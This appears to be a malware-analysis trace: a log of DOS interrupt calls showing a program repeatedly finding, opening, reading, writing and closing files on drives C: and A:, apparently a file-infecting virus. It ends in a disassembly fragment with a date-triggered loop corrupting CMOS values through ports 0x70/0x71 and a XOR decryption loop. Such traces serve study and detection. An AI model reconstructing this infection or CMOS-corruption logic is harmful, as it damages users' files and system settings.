2018-12-25T12:43:33.764997176Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.769235748Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.920046553Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.923057735Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.925569109Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.021266978Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.028603602Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.046373713Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.047822367Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.050862434Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.054708473Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.056673518Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.058351385Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.067234713Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.070427318Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.078445226Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.081273779Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.08323863Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.095213161Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.103257036Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.11108026Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.112456142Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.115101696Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.120348637Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.12254529Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.124628678Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.133991611Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.136227306Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.144256525Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.148056218Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.149354365Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.158928724Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.168715824Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.175021601Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.176668789Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.180311028Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.182925855Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.18427589Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.186566788Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.195558638Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.197906261Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.206637443Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.2093295Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.210508729Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.221316065Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.227829645Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.234401987Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.236749855Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.239652064Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.242483763Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.244876778Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.246492428Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.254456582Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.258308211Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.266418362Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.269262837Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.27144626Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.281301302Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.287992625Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:34.291585565Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.294031629Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:34.296674407Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:34.298188121Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:34.300589629Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:34.30640275Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:34.315293248Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.317829711Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.730618022Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.737591124Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.745090442Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.746882258Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.74996756Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.754366753Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.756183002Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.757941367Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.769882047Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.772707663Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.779722817Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.783689096Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.785421037Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.794638656Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.803717084Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.809262993Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.810867342Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.814047306Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.827629642Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.830520438Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.833540497Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.835288559Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.836963679Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.844523292Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.847145301Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.854097973Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.857304406Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.859107832Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.8692673Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.875911621Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.882325533Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.883777058Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.886216662Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.887762313Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.890090034Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.892599293Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.894022563Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.89525495Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.902430473Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.904436549Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.911230057Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.916896593Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.918499244Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.927560995Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.934835101Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.94069065Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.941838303Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.944310668Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.946168004Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.948564687Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.950933017Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.952964439Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.954317409Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.961052163Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.963569079Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.970185872Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.975830665Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.977221384Z 42 PC: 13ff4 | Get date
0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36